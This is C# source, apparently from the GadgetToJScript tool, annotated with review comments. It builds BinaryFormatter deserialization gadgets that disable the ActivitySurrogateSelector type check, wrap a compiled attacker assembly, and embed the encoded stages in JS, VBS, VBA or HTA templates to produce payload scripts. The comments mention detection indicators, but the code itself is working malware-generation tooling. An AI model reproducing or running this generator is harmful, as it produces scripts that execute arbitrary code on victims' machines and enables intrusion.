/// <summary>
/// Program entry point: fills an embedded script template with two serialized
/// payload blobs and writes the result to a <c>.js</c> file in the working directory.
/// Both blobs come from <see cref="BinaryFormatter"/> serialization (stage two directly,
/// stage one via <c>DisableTypeCheckGadgetGenerator</c>), are Base64-encoded and then
/// passed through <c>CaesarShift(..., 12)</c> before substitution.
/// </summary>
/// <remarks>
/// Review notes: <see cref="Assembly.GetManifestResourceStream"/> returns <c>null</c> when
/// the named resource ("SourceCode", "Template") is absent, so <c>new StreamReader(stream)</c>
/// would throw <see cref="ArgumentNullException"/> rather than a descriptive error.
/// <see cref="BinaryFormatter"/> is an insecure, deprecated serializer; its presence together
/// with the <c>DisableActivitySurrogateSelectorTypeCheck</c> AppSettings toggle is a
/// high-signal indicator for detection engineering. <c>CaesarShift</c>, <c>InternalCompiler</c>,
/// <c>DisableTypeCheckGadgetGenerator</c> and <c>SurrogateGadgetGenerator</c> are defined
/// outside this listing.
/// </remarks>
static void Main()
{
    string source;
    string template;
    // Embedded resource "SourceCode": C# text compiled below by InternalCompiler.compile.
    using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("SourceCode"))
    {
        using (StreamReader sr = new StreamReader(stream))
        {
            source = sr.ReadToEnd();
        }
    }
    // Embedded resource "Template": script text holding the %STAGE_*% / %SIZE_OF_STAGE_*% placeholders.
    using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Template"))
    {
        using (StreamReader sr = new StreamReader(stream))
        {
            template = sr.ReadToEnd();
        }
    }
    // Process-wide AppSettings override set before any serialization below.
    // NOTE(review): this key is the documented .NET Framework switch for the
    // ActivitySurrogateSelector type check; presumably required here so the local
    // BinaryFormatter.Serialize call is not rejected — confirm against the generator classes.
    ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
    // Stage one: generated into a fresh MemoryStream by the generator (returned stream is used, not the argument).
    DisableTypeCheckGadgetGenerator dtcgg = new DisableTypeCheckGadgetGenerator();
    MemoryStream stageOne = dtcgg.generateGadget(new MemoryStream());
    // Base64 then CaesarShift(…, 12); the size placeholder receives the raw (pre-encoding) byte length.
    template = template.Replace("%STAGE_1%", CaesarShift(Convert.ToBase64String(stageOne.ToArray()), 12));
    template = template.Replace("%SIZE_OF_STAGE_1%", stageOne.Length.ToString());
    // Stage two: compile the embedded source, wrap the assembly in SurrogateGadgetGenerator and serialize it.
    Assembly assembly = InternalCompiler.compile(source);
    BinaryFormatter bf = new BinaryFormatter(); // insecure serializer — see <remarks>
    MemoryStream stageTwo = new MemoryStream();
    SurrogateGadgetGenerator sgg = new SurrogateGadgetGenerator(assembly);
    bf.Serialize(stageTwo, sgg);
    template = template.Replace("%STAGE_2%", CaesarShift(Convert.ToBase64String(stageTwo.ToArray()), 12));
    template = template.Replace("%SIZE_OF_STAGE_2%", stageTwo.Length.ToString());
    // Output path: <current directory>\<this process name>.js — overwrites silently if it exists.
    File.WriteAllText(Path.Combine(Directory.GetCurrentDirectory(), Process.GetCurrentProcess().ProcessName + ".js"), template);
}
/// <summary>
/// Command-line entry point: parses options, selects an embedded script template by
/// script type (<c>js</c>, <c>vbs</c>, <c>vba</c>, <c>hta</c>), fills its stage placeholders with
/// two serialized blobs and writes <c>&lt;output&gt;.&lt;scriptType&gt;</c>.
/// </summary>
/// <param name="args">Raw command-line arguments handed to <see cref="OptionSet.Parse"/>.</param>
/// <remarks>
/// Review notes: <c>_inputFName</c>, <c>_references</c>, <c>_wsh</c>, <c>_enc</c>, <c>_regFree</c>,
/// <c>ShowHelp</c>, <c>SplitToLines</c>, <c>EWSH</c>, <c>ENC</c>, <c>AssemblyLoader</c> and the two
/// generator classes are declared outside this listing; the <c>== ""</c> checks assume those
/// fields default to the empty string rather than <c>null</c> — TODO confirm.
/// <see cref="Assembly.GetManifestResourceStream"/> yields <c>null</c> for a missing template,
/// which surfaces as an <see cref="ArgumentNullException"/> from <c>new StreamReader(stream)</c>.
/// <see cref="BinaryFormatter"/> is an insecure, deprecated serializer, and the
/// <c>DisableActivitySurrogateSelectorTypeCheck</c> toggle is set process-wide; both are
/// strong detection indicators. Unlike the other <c>Main()</c> on this page, no Caesar shift is
/// applied — blobs are plain Base64 (or hex for VBA when <c>_enc</c> is not <c>b64</c>).
/// </remarks>
static void Main(string[] args)
{
    var show_help = false;
    // Option callbacks write straight into static fields declared elsewhere in the class.
    OptionSet options = new OptionSet()
    {
        { "i|input=", "Input file, example: C:\\Users\\userX\\Desktop\\payload.cs", v => _inputFName = v },
        { "r|references=", "Reference Assemblies, example: System.dll,System.IO.Compression.dll", v => _references = v },
        { "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
        { "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v },
        { "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
        { "f|regfree", "Registration-free activation of .NET based COM components", v => _regFree = v != null },
        { "h|?|help", "Show Help", v => show_help = v != null },
    };
    try
    {
        options.Parse(args);
        // Every validation failure prints help and exits; no distinct exit code is set.
        if (show_help) { ShowHelp(options); return; }
        if (_wsh == "" || _outputFName == "" || _inputFName == "") { ShowHelp(options); return; }
        // Enum.IsDefined with a string argument matches on member *name*, so EWSH/ENC
        // members must be named exactly like the accepted option values (case-sensitive).
        if (!Enum.IsDefined(typeof(EWSH), _wsh)) { ShowHelp(options); return; }
        if (!Enum.IsDefined(typeof(ENC), _enc)) { ShowHelp(options); return; }
    }
    catch (Exception e)
    {
        Console.Error.WriteLine(e.Message);
        ShowHelp(options);
        return;
    }
    // Template resource name by script type; the default arm mirrors "js" and is only
    // reachable if EWSH defines a member not handled above.
    string resourceName = "";
    switch (_wsh)
    {
        case "js":
            if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; }
            else { resourceName = "GadgetToJScript.templates.jscript.template"; }
            break;
        case "vbs":
            resourceName = "GadgetToJScript.templates.vbscript.template";
            break;
        case "vba":
            if (_enc == "b64") { resourceName = "GadgetToJScript.templates.vbascriptb64.template"; }
            else { resourceName = "GadgetToJScript.templates.vbascripthex.template"; }
            break;
        case "hta":
            resourceName = "GadgetToJScript.templates.htascript.template";
            break;
        default:
            if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; }
            else { resourceName = "GadgetToJScript.templates.jscript.template"; }
            break;
    }
    // Stage one: the generator returns the stream to use; the original _msStg1 instance is discarded.
    MemoryStream _msStg1 = new MemoryStream();
    DisableTypeCheckGadgetGenerator _disableTypCheckObj = new DisableTypeCheckGadgetGenerator();
    _msStg1 = _disableTypCheckObj.GenerateGadget(_msStg1);
    // Process-wide AppSettings override, set here after stage one but before stage two is serialized.
    // NOTE(review): this is the documented .NET Framework switch for the ActivitySurrogateSelector
    // type check; presumably needed for the Serialize call below to succeed locally — confirm.
    ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
    // Stage two: compile the user-supplied .cs file against the given references and serialize the wrapper.
    Assembly testAssembly = AssemblyLoader.Compile(_inputFName, _references);
    BinaryFormatter _formatterStg2 = new BinaryFormatter(); // insecure serializer — see <remarks>
    MemoryStream _msStg2 = new MemoryStream();
    ASurrogateGadgetGenerator _gadgetStg = new ASurrogateGadgetGenerator(testAssembly);
    _formatterStg2.Serialize(_msStg2, _gadgetStg);
    Assembly assembly = Assembly.GetExecutingAssembly();
    string _wshTemplate = "";
    using (Stream stream = assembly.GetManifestResourceStream(resourceName))
    {
        if (_wsh != "vba")
        {
            // js / vbs / hta templates take single-line Base64 plus the raw byte length of each stage.
            using (StreamReader reader = new StreamReader(stream))
            {
                _wshTemplate = reader.ReadToEnd();
                _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
                _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
                _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
                _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
            }
        }
        else
        {
            // VBA templates get the blob as 100-character chunks rendered as
            // `stage_N = "..."` followed by `stage_N = stage_N & "..."` continuation lines.
            List <string> stage1Lines = new List <String>();
            List <string> stage2Lines = new List <String>();
            if (_enc == "b64")
            {
                stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList();
                stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList();
            }
            else
            {
                // Hex encoding: BitConverter emits "AA-BB-…", so the separators are stripped first.
                stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList();
                stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList();
            }
            // stage1Lines[0] / stage2Lines[0] throw ArgumentOutOfRangeException on an empty blob
            // (not expected here, but there is no explicit guard).
            StringBuilder _b1 = new StringBuilder();
            _b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\"");
            _b1.AppendLine();
            stage1Lines.RemoveAt(0);
            foreach (String line in stage1Lines)
            {
                _b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\"");
                _b1.AppendLine();
            }
            StringBuilder _b2 = new StringBuilder();
            _b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\"");
            _b2.AppendLine();
            stage2Lines.RemoveAt(0);
            foreach (String line in stage2Lines)
            {
                _b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\"");
                _b2.AppendLine();
            }
            // The VBA templates carry no %_STAGE*Len_% placeholders; only the two blobs are substituted.
            using (StreamReader reader = new StreamReader(stream))
            {
                _wshTemplate = reader.ReadToEnd();
                _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString());
                _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString());
            }
        }
    }
    // Output file: <output option>.<script type>; StreamWriter overwrites an existing file without warning.
    using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
    {
        _generatedWSH.WriteLine(_wshTemplate);
    }
}